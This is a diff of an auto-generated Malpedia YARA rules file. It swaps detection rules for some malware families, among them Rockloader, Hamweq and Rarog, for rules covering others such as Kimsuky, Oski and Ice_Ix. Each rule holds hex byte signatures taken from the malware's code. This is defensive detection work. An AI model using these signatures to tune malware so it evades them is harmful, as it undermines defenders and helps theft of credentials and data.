-		$sequence_3 = { 88543c1d 418d50ad 8854341d 4883c002 4883f81e 7d27 0fb6540432 }
-		$sequence_4 = { eb8d 0f1f00 e8???????? 488d0514b23900 bb10000000 e8???????? 488d05a2de3900 }
-		$sequence_5 = { c3 e8???????? 0f1f440000 e8???????? 4889c3 488d0531862000 e8???????? }
-		$sequence_6 = { 752e 4c8b8424380b0000 4c8944d0d8 488d14d0 488d52e0 0f108424400b0000 0f1102 }
-		$sequence_7 = { bf01000000 488d35142c2800 e8???????? 4c8b442450 4c8b4c2440 4889da 4889c7 }
-		$sequence_8 = { e8???????? 450f57ff 4c8b35???????? 654d8b36 4d8b36 488d0538d53800 bb33000000 }
-		$sequence_9 = { 4c0f4ce7 4d39e3 7dc4 4c8b7828 4d29fa 4c8b7818 4d0fafd7 }
+		$sequence_0 = { 0f8274ffffff 6683ff04 0f8596000000 33ff 8d45e4 668b55ee c1e202 }
+		$sequence_1 = { 8d8db4feffff 8bd3 8bc6 8b38 ff570c 8b85b4feffff 5a }
+		$sequence_2 = { 85c0 7405 3b50fc 7205 e8???????? 42 8d4410ff }
+		$sequence_3 = { 50 6a00 8bc3 e8???????? 50 ff15???????? }
+		$sequence_4 = { 3b45e4 0f84ab000000 ff45e4 807dee00 742c 8b55e4 2bd0 }
+		$sequence_5 = { 3345fc 03c6 0345cc 05c8fbd3e7 ba14000000 e8???????? 03c7 }
+		$sequence_6 = { 8bda 8bf0 8bc3 ba02000000 e8???????? 8bc3 e8???????? }
+		$sequence_7 = { 33c0 8945ec 837df000 7426 83caff 8b45f8 }
+		$sequence_8 = { 3bc3 7c07 807c1eff20 74f4 57 b9ffffff7f 8bd3 }
+		$sequence_9 = { 8b45fc 8b88d0010000 ba02000000 8b45fc 8b18 ff534c ff75e4 }
 
 	condition:
-		7 of them and filesize < 12821504
+		7 of them and filesize < 1736704
 }
-rule MALPEDIA_Win_Rockloader_Auto : FILE
+rule MALPEDIA_Win_Kimsuky_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "96a7a61e-00d6-5fd3-8dcd-0a299f4f2b93"
+		id = "f4610f8d-61c2-57de-821a-2002989958af"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rockloader_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kimsuky_auto.yar#L1-L287"
 		license_url = "N/A"
-		logic_hash = "7138f3c287966f118168a5a68bdeb5d70100d456e15e650d1baf5a7a96ef38bb"
+		logic_hash = "838ee4b29f510aa7418362f03ac18e28c0399175424b76481d712ac3c06c7bee"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -108028,32 +108142,53 @@ rule MALPEDIA_Win_Rockloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { dd5ddc 9b dbe3 dd45dc db5df8 8b55f8 }
-		$sequence_1 = { 40 8a0c30 3acb 75f3 8a0c30 3acb 7413 }
-		$sequence_2 = { 7515 85c0 7505 c60632 }
-		$sequence_3 = { 48 0f84ef000000 48 7407 880e }
-		$sequence_4 = { 8d85a0f7ffff 50 56 c745ece8030000 }
-		$sequence_5 = { 83e915 741f 83e93a 7415 50 68???????? 56 }
-		$sequence_6 = { 7c0e 80f939 7f09 0fbec9 8d44c1d0 eb24 }
-		$sequence_7 = { ff36 53 e8???????? ff36 ff15???????? 8b4608 897e04 }
-		$sequence_8 = { db45f8 8a08 dd45ec d8ca }
-		$sequence_9 = { ff15???????? 8bf3 85db 75b5 5f 5b 5e }
+		$sequence_0 = { 83c418 8d85f8feffff 6a00 50 }
+		$sequence_1 = { 6a00 e8???????? 83c418 50 ff15???????? 8b4dfc }
+		$sequence_2 = { a1???????? 33c5 8945fc 833d????????00 7413 }
+		$sequence_3 = { 740a 33ff ff15???????? eb06 ff15???????? }
+		$sequence_4 = { 6a00 8d85e8fdffff 50 8d85f0feffff 50 ff15???????? 85c0 }
+		$sequence_5 = { 75f9 2bca 51 8d85e4f5ffff 50 6a00 }
+		$sequence_6 = { ff15???????? 85c0 7516 ff15???????? 8bd8 e8???????? 0fafd8 }
+		$sequence_7 = { a3???????? 8d85dcf7ffff 50 53 ffd7 a3???????? }
+		$sequence_8 = { 83c430 8d95f0fcffff b9???????? e8???????? 8d95ecfbffff b9???????? }
+		$sequence_9 = { 4889742438 4533ff 4c89642428 4c896c2420 33f6 }
+		$sequence_10 = { ebdb 65488b042560000000 48897c2430 48896c2460 }
+		$sequence_11 = { 4533ed 4533e4 4c897c2468 e8???????? 488be8 b84d5a0000 0f1f440000 }
+		$sequence_12 = { 33d2 4883c9ff 4903de ff542468 4533c0 498bce 418d5001 }
+		$sequence_13 = { 468b540f20 468b5c0f24 4d03d1 4d03d9 666666660f1f840000000000 418b0a }
+		$sequence_14 = { 4533c0 498bce 418d5001 ffd3 488bc3 4883c440 415f }
+		$sequence_15 = { 0f8540feffff 488b6c2460 4c637d3c 33c9 }
+		$sequence_16 = { 4c89642430 c744242880000000 c744242002000000 4533c9 4533c0 }
+		$sequence_17 = { 898521010000 66898525010000 888527010000 8b742450 }
+		$sequence_18 = { 8bbda0010000 8d4702 03c2 89442450 }
+		$sequence_19 = { 894d90 8bc1 81fb00000001 0f97c0 }
+		$sequence_20 = { 83f809 8d7340 7405 be20000000 c68424a000000000 33d2 }
+		$sequence_21 = { 8bd7 3bd8 0f94c2 85d2 7419 }
+		$sequence_22 = { 488d8a38000000 e9???????? 488d8a28010000 e9???????? }
+		$sequence_23 = { 85c0 0f8432020000 8b7590 660f1f440000 }
+		$sequence_24 = { 85c0 0f94c1 85c9 0f8494020000 89bda0000000 897d30 33c0 }
+		$sequence_25 = { 6690 6644396102 488d4902 75f5 }
+		$sequence_26 = { 66c1e908 880c02 ff07 448b0f }
+		$sequence_27 = { 6690 8bd7 4d8d45f0 83ff10 }
+		$sequence_28 = { 6690 49ffc0 6642833c4000 75f5 488d95ac020000 }
+		$sequence_29 = { 6690 6644396202 488d5202 75f5 }
+		$sequence_30 = { 6690 49ffc0 6642392c42 75f6 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 1021952
 }
-rule MALPEDIA_Win_Hamweq_Auto : FILE
+rule MALPEDIA_Win_Vflooder_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "472b9f91-ae73-5b23-84d5-48c0a12f0ce8"
+		id = "76477b84-f3c3-5da1-86fd-c61daea161aa"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hamweq_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vflooder_auto.yar#L1-L106"
 		license_url = "N/A"
-		logic_hash = "97fb94f14abe15a4280f753f2ae96a2750195cd748cddbf78c3df32e07994a82"
+		logic_hash = "d33638034753d47f1d3c882a126dc14f7048d70033f800573b6ecd2c27103b12"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108067,71 +108202,71 @@ rule MALPEDIA_Win_Hamweq_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6800000040 50 ff5118 8945f4 }
-		$sequence_1 = { 740d 3c32 7409 c745fc01000000 eb33 8d45e0 8b0e }
-		$sequence_2 = { 8b06 ff7140 8d8de0fdffff 51 ff5048 }
-		$sequence_3 = { 0f8484030000 837de000 0f847a030000 85c0 0f8472030000 }
-		$sequence_4 = { ffb150010000 8d8de8fdffff 51 ff5048 }
-		$sequence_5 = { 50 8d85ecfeffff 50 895dfc ff5154 8b06 8d8decfeffff }
-		$sequence_6 = { 8d4580 8b0b 50 ff5154 }
-		$sequence_7 = { 8b06 753c ffb1d8000000 8d8d00feffff 51 }
-		$sequence_8 = { 889decfeffff ffb178010000 8d8decfeffff 51 }
-		$sequence_9 = { ff75f8 ffd6 ff35???????? 898534ffffff ff75f8 ffd6 ff35???????? }
+		$sequence_0 = { e8???????? 0000 43 7265 61 }
+		$sequence_1 = { b02e f5 f2ae e8???????? }
+		$sequence_2 = { f5 83ef04 f5 ff37 }
+		$sequence_3 = { 3b45f0 60 9c 8d642424 }
+		$sequence_4 = { 9c 60 9c 9c 8d642430 }
+		$sequence_5 = { 0000 43 7265 61 }
+		$sequence_6 = { 60 ff35???????? 8f442438 9c }
+		$sequence_7 = { 9c ff742404 8f4500 9c }
+		$sequence_8 = { 9c ff742404 8d642434 e9???????? }
+		$sequence_9 = { 9c f2ae 9c 9c }
 
 	condition:
-		7 of them and filesize < 24576
+		7 of them and filesize < 860160
 }
-rule MALPEDIA_Win_Colibri_Auto : FILE
+rule MALPEDIA_Win_Unidentified_094_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8da162c4-201b-5524-b753-fac10e260355"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.colibri_auto.yar#L1-L130"
+		id = "f5bdd8f3-d974-5222-9555-3631072a29c0"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_094"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_094_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "4b78974320f8236aa3537bed6c446de746d50c1762246c89daad71b2e8c53347"
+		logic_hash = "f3d0ed91e99c9ab03a6ddd24a2a28007a40b7e677077c8b725a5a67f32cc52a7"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb03 8b75f8 a1???????? 8bcb 8d144502000000 e8???????? a1???????? }
-		$sequence_1 = { 1bc9 81e100008000 51 53 53 ff770c ff7708 }
-		$sequence_2 = { 03c6 8945f4 85db 7417 8b0cba 03ce e8???????? }
-		$sequence_3 = { 33d0 8bc2 c1e80b eb23 0fb706 03d0 }
-		$sequence_4 = { 33c0 663b4f06 eb70 8b55fc 0fb7c0 6bf028 8b541624 }
-		$sequence_5 = { 8d8564fbffff 50 6a05 59 e8???????? }
-		$sequence_6 = { 83e801 7448 83e801 0f859f000000 85f6 7433 8bce }
-		$sequence_7 = { 3bce 7363 8b39 85ff 745a 8b4104 8d5108 }
-		$sequence_8 = { ffd0 85c0 745d 8b4df0 e8???????? 8bf8 }
-		$sequence_9 = { 6a02 59 e8???????? ba724e4352 8bc8 e8???????? ffd0 }
+		$sequence_0 = { 890d???????? 57 8915???????? a3???????? 83ceff b9???????? }
+		$sequence_1 = { 6a5c 68???????? e8???????? 83c408 33c9 }
+		$sequence_2 = { 0fb65004 3015???????? 0fb64805 300d???????? 0fb65006 3015???????? }
+		$sequence_3 = { 83c310 ff4d0c 0f857ffeffff 5f }
+		$sequence_4 = { 0fb65004 3015???????? 0fb64805 300d???????? 0fb65006 3015???????? c3 }
+		$sequence_5 = { 884dff 84d2 7902 341b }
+		$sequence_6 = { 3055fd 0fb61401 3055fe 0fb6540101 3055ff 8b55fc 89540102 }
+		$sequence_7 = { 6a00 6a00 6a00 ff15???????? c3 }
+		$sequence_8 = { 80f31b 8ad3 02d2 84db 7903 80f21b }
+		$sequence_9 = { 890d???????? 57 8915???????? a3???????? }
 
 	condition:
-		7 of them and filesize < 51200
+		7 of them and filesize < 524288
 }
-rule MALPEDIA_Win_Dropshot_Auto : FILE
+rule MALPEDIA_Win_Rad_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8c0e25df-1d9c-5bb9-85ce-2d5bc4ccd180"
+		id = "cf7df94d-6d22-5657-82bf-7d35a5482def"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dropshot_auto.yar#L1-L100"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rad"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rad_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "3f5f25fe800a01f710cc89be583f98653a26f14448d6ba599306a1d4d7c2a368"
+		logic_hash = "1eec20ddabb813a5b7c10180af0c0f122f744f026c6b5d60bcc21414af7a0dac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108145,30 +108280,32 @@ rule MALPEDIA_Win_Dropshot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 5d c3 3b0d???????? f27502 f2c3 }
-		$sequence_1 = { e8???????? 83c40c 6a04 6800100000 6804010000 6a00 ff15???????? }
-		$sequence_2 = { 6a64 ff15???????? 6800800000 6a00 }
-		$sequence_3 = { ff15???????? 6a04 6800100000 6808020000 6a00 }
-		$sequence_4 = { eb05 e8???????? 68e8030000 ff15???????? }
-		$sequence_5 = { 6a00 68???????? 6a00 ff15???????? b801000000 }
-		$sequence_6 = { 6a00 ff15???????? 6a05 ff15???????? ff15???????? }
-		$sequence_7 = { 6a00 6a00 ff15???????? 6a00 6a00 68???????? }
+		$sequence_0 = { e9???????? 8d8520feffff 50 e8???????? c3 8d85c0fcffff 50 }
+		$sequence_1 = { 68???????? 8d4df8 68???????? 51 ffd7 83c410 }
+		$sequence_2 = { 8db514faffff e9???????? 8db5f8f9ffff e9???????? 8d8d88faffff ff25???????? 8db5dcf9ffff }
+		$sequence_3 = { ff15???????? 8bc6 8b8c24e0000000 64890d00000000 59 5e 5b }
+		$sequence_4 = { c684240001000002 85f6 7439 8d8c24d4000000 }
+		$sequence_5 = { 7556 8bce 897508 ff15???????? 8d55f0 52 8bce }
+		$sequence_6 = { 51 8d8d34ffffff ff15???????? 8d8d10ffffff c645fc03 ff15???????? 8b35???????? }
+		$sequence_7 = { 84c0 0f84c5000000 b8???????? 8dbc24e0000000 e8???????? 8bcf 51 }
+		$sequence_8 = { c684240c06000022 ff15???????? 8b4c241c 50 81c1c4030000 c684240c06000023 ff15???????? }
+		$sequence_9 = { 8b8d00ffffff 8b5104 8d8550ffffff 898510fdffff c7841500ffffffa4e64000 8d8504ffffff }
 
 	condition:
-		7 of them and filesize < 483328
+		7 of them and filesize < 207872
 }
-rule MALPEDIA_Win_Tellyouthepass_Auto : FILE
+rule MALPEDIA_Win_Ice_Ix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b0d976f4-0236-5ffd-9bc3-701324f1d00b"
+		id = "3971da01-8501-5ba0-8d5a-dc36a272dee6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tellyouthepass_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ice_ix_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "ecb0bbbbbf71d6e52cc61fe6d246b41bf4e7a6e9ebef1f549c3bac2b8ab00a58"
+		logic_hash = "297f8752913927ba432b9de91965d7e2bc2305cd2fc61a756292f8224e68d59e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108182,71 +108319,71 @@ rule MALPEDIA_Win_Tellyouthepass_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4d21da 4d01d1 eb7c 4584c0 7409 833d????????00 7417 }
-		$sequence_1 = { e8???????? e8???????? 4889c3 488d05c54b0d00 0f1f440000 e8???????? 488d05b44b0d00 }
-		$sequence_2 = { e9???????? 4c8b542448 80fae2 0f85ae000000 4d8d5701 4d39d4 0f8650040000 }
-		$sequence_3 = { 48895c2410 488d0dcfcf0800 4839c8 7405 bb00000000 7578 488b0b }
-		$sequence_4 = { 488d8c24d0010000 e8???????? b801000000 488bac24c8030000 4881c4d0030000 c3 4c8b9424d8030000 }
-		$sequence_5 = { 8402 4881c2c0160000 4889d0 6690 e8???????? 488b4c2420 488d4101 }
-		$sequence_6 = { 7425 488905???????? 833d????????00 7509 48891d???????? eb0c 488d3daeb21b00 }
-		$sequence_7 = { 4d8d52d9 41803a00 0f1f00 0f84b2000000 90 4a8b4cc2f0 4a8b5cc2f8 }
-		$sequence_8 = { 7d34 884c2445 bb01000000 e8???????? 660f1f440000 84c0 0f842d150000 }
-		$sequence_9 = { bb17000000 e8???????? 488b442428 e8???????? 488d05ee551900 bb0a000000 e8???????? }
+		$sequence_0 = { 897c2414 6a78 8d74243c 58 e8???????? 8b44240c 8b08 }
+		$sequence_1 = { 7564 6a62 8db550ffffff 58 }
+		$sequence_2 = { 8d75dc b893000000 e8???????? 8d45fc }
+		$sequence_3 = { f645f404 7433 6a4a 8d75cc }
+		$sequence_4 = { 6a00 8d45f4 50 e8???????? 8db5d8feffff b89b000000 }
+		$sequence_5 = { 6836084923 e8???????? 8945e8 85c0 7506 40 e9???????? }
+		$sequence_6 = { 56 ff5008 8b7df8 68cc000000 6a36 58 e8???????? }
+		$sequence_7 = { 7641 8d1438 8a0a 80f926 7505 }
+		$sequence_8 = { e8???????? 6a0a 8d7c2438 58 e8???????? 8b4508 8b00 }
+		$sequence_9 = { eb04 897c241c 6a77 8d742454 }
 
 	condition:
-		7 of them and filesize < 7152640
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Decaf_Auto : FILE
+rule MALPEDIA_Win_Unidentified_075_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "67190af4-1ce0-57cf-b346-2c883278a90f"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.decaf"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.decaf_auto.yar#L1-L134"
+		id = "147c0d53-aecb-5cae-ac7f-14d52d3c203f"
+		date = "2023-07-11"
+		modified = "2023-07-15"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_075_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "7a70ed6fa2a0ce3cf4802d2d0ae4afe2a54da0a94bb0916dbc97593071b29978"
+		logic_hash = "10617fdfd534147bc5e0f7e922724e69d45c37af66d21f98c629fa1bac685120"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20230705"
+		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
+		malpedia_version = "20230715"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { be02000000 e8???????? 0fb6542459 0fb6742458 29f2 8810 0fb6542457 }
-		$sequence_1 = { e8???????? 48c7400817000000 488d0dd8a81600 488908 48c7401000000000 4889c3 488d05d7e71300 }
-		$sequence_2 = { e9???????? 4c8d4302 4c39c6 7337 4c89442468 488d05d8a30300 4889d9 }
-		$sequence_3 = { eb12 4883fa03 750c 488d157e013400 f0480fc102 ba01000000 4c8d059d053400 }
-		$sequence_4 = { ffd1 488b08 4889c2 b8c7ffffff ffd1 48c744241000000000 488b4c2428 }
-		$sequence_5 = { 488b8c24f01c0000 48894818 eb11 488d7818 488b8c24f01c0000 e8???????? 488b8c24100a0000 }
-		$sequence_6 = { 4983f804 0f8f72010000 90 4983f802 0f8faf000000 4d85c0 755b }
-		$sequence_7 = { 488d3dcb351c00 e8???????? e8???????? 48898424e0030000 48899c2408010000 488b0d???????? 48898c24c8050000 }
-		$sequence_8 = { e8???????? 488b442478 488b4c2470 488b942488000000 ebbd 90 488d05bfff1d00 }
-		$sequence_9 = { eb14 488d7818 488b8c2470220000 0f1f00 e8???????? 488b8c24a8030000 48894808 }
+		$sequence_0 = { e8???????? 83c40c 6808020000 8d95dcf6ffff 52 6a00 }
+		$sequence_1 = { 8bc1 5e 5d c3 55 8bec ff15???????? }
+		$sequence_2 = { 52 e8???????? 6a00 8d85ace6ffff 50 8d8dbceeffff 51 }
+		$sequence_3 = { 83c40c 33c0 668985d4f4ffff 6806020000 }
+		$sequence_4 = { 837d9400 740d 8b55fc c7821002000000000000 837df000 }
+		$sequence_5 = { 52 ff15???????? 83c410 b853000000 66898550ffffff }
+		$sequence_6 = { 33c0 668945d0 8d4dd4 51 }
+		$sequence_7 = { 742c 8b4514 85c0 7421 }
+		$sequence_8 = { 85c0 0f8431ffffff b901000000 85c9 0f8515ffffff }
+		$sequence_9 = { 81eca4000000 894dfc c745f400000000 c745f800000000 }
 
 	condition:
-		7 of them and filesize < 7193600
+		7 of them and filesize < 393216
 }
-rule MALPEDIA_Win_Rarog_Auto : FILE
+rule MALPEDIA_Win_Oski_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6993ce44-e3a7-570d-bdd2-f949ea883388"
+		id = "00507fe9-9209-5e5a-8102-b7f791efd242"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rarog_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oski_auto.yar#L1-L180"
 		license_url = "N/A"
-		logic_hash = "dcc275a3610670298392baeef430ff6a6f46366e16201b4054f65002692c15e6"
+		logic_hash = "35c4af68aedcbb90eed8cfba69202373adfb8560464fdea190e8d4d9190a864c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108260,34 +108397,41 @@ rule MALPEDIA_Win_Rarog_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 68ffff1f00 ff15???????? 8bf8 57 ff15???????? 57 }
-		$sequence_1 = { 8819 e8???????? 83ec1c 8bc4 89a590fbffff 50 c645fc61 }
-		$sequence_2 = { 8d8dd0feffff e8???????? 8d8d9cfdffff 51 8d8db4feffff 51 8bc8 }
-		$sequence_3 = { 8d8d7cfeffff e9???????? 8d8dd0feffff e9???????? }
-		$sequence_4 = { 8bf0 8bc4 e8???????? 83ec1c 8bcc c645fc3a 89a58cfbffff }
-		$sequence_5 = { 50 e8???????? 59 59 3bc7 7431 8bce }
-		$sequence_6 = { c746140f000000 895e10 881e 895dfc 8b4710 0305???????? }
-		$sequence_7 = { 83c40c ff75b4 8945ac 0fbe45a0 50 57 }
-		$sequence_8 = { e9???????? 8d8dfcfeffff e9???????? 8d8d50ffffff e9???????? 8d4da4 e9???????? }
-		$sequence_9 = { 53 56 8d8d2cfdffff e8???????? 53 56 8d8df4fcffff }
+		$sequence_0 = { 50 a1???????? 50 8d8df0feffff }
+		$sequence_1 = { 25ff7f0000 c3 8bff 55 8bec 83ec14 ff7510 }
+		$sequence_2 = { e8???????? 83c40c e8???????? 50 a1???????? }
+		$sequence_3 = { 8975f0 e8???????? cc 8bff 55 8bec 8b550c }
+		$sequence_4 = { 0f8584fbffff 668b8590fbffff 83431810 66898568fbffff }
+		$sequence_5 = { 85c0 7557 8bb54ce0ffff 8b8d48e0ffff }
+		$sequence_6 = { 50 ff15???????? e8???????? 57 ff15???????? 8b4df8 }
+		$sequence_7 = { 85c0 0f8468010000 ff15???????? 8bf0 }
+		$sequence_8 = { 83c40c 8d959cfbffff 52 8d85dcfcffff 50 }
+		$sequence_9 = { f3c3 e9???????? 8bff 55 8bec 83ec1c a1???????? }
+		$sequence_10 = { 8b511c 83c220 52 6a00 }
+		$sequence_11 = { 8d45fc 50 8d4df8 51 6800020000 8b55f4 52 }
+		$sequence_12 = { 83c404 8b55f8 8955f4 8b45f4 50 e8???????? }
+		$sequence_13 = { 8b45f4 50 e8???????? 83c404 8b0d???????? 51 ff15???????? }
+		$sequence_14 = { 68???????? 6a00 e8???????? 83c40c 8985e4fdffff }
+		$sequence_15 = { 6800020000 8b55f4 52 ff15???????? 8945f0 837df000 }
+		$sequence_16 = { 8d55f4 52 6a00 68???????? ff15???????? 8945f0 837df000 }
 
 	condition:
-		7 of them and filesize < 598016
+		7 of them and filesize < 423936
 }
-rule MALPEDIA_Win_Nspx30_Auto : FILE
+rule MALPEDIA_Win_Oni_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "47a5f87a-bd45-5a39-bf1f-2280475ca3dc"
+		id = "5b8ed8df-ac04-55ed-9aa1-c25508ccaf69"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nspx30"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nspx30_auto.yar#L1-L307"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oni"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oni_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "60a2afbb46ed2d066c5213f1fddc7a9e909463149f91997e5d932b09b46a1178"
+		logic_hash = "a1166454b136e06548b4b89fd8ff394c058729ff7d3b6449cb76520548366b87"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -108299,53 +108443,32 @@ rule MALPEDIA_Win_Nspx30_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f3ab 66ab aa b06c }
-		$sequence_1 = { 0f8794000000 8088c166001004 40 ebee 8365fc00 }
-		$sequence_2 = { c644240e6e c644240f64 c64424106f c644241177 c644241273 88542413 }
-		$sequence_3 = { 6689842424010000 66899c2426010000 6689ac2428010000 6689bc242a010000 668984242c010000 66c784242e0100003200 6689842430010000 }
-		$sequence_4 = { 55 8bec 8b4508 56 833c850061001000 8d348500610010 753e }
-		$sequence_5 = { ff15???????? 83c8ff 5e c20800 6879270000 ff15???????? 83c8ff }
-		$sequence_6 = { 8d7c2410 83c9ff 33c0 83c404 f2ae }
-		$sequence_7 = { 33d2 b940000000 33c0 8d7c2415 88542414 f3ab 66ab }
-		$sequence_8 = { 756c 8d84241c010000 68???????? 50 ffd6 }
-		$sequence_9 = { a3???????? 5d c3 ff15???????? 33c9 }
-		$sequence_10 = { 0c01 88443124 eb34 80c980 884c3704 8b0c9d384c0410 8a443124 }
-		$sequence_11 = { 7c00 10547c00 10767c 0010 d07c0010 a0???????? 7c00 }
-		$sequence_12 = { aa b06c 6804010000 8844240c }
-		$sequence_13 = { 8bf8 8b4508 8d34c6 8d450c 50 }
-		$sequence_14 = { 85c0 0f8475010000 85ff 0f846d010000 ba42000000 6a00 }
-		$sequence_15 = { 66c78424ee0000003a00 66c78424f00000007b00 66c78424f20000004600 6689bc24f8000000 66898c24fa000000 66899424fc000000 }
-		$sequence_16 = { 03cb e8???????? f30f7e442414 660fd600 f30f7e44241c }
-		$sequence_17 = { 8a02 83f078 05ae000000 25ff000080 7907 }
-		$sequence_18 = { 88441905 8b0c95384c0410 8a45f9 88441925 8b0495384c0410 6a0a 59 }
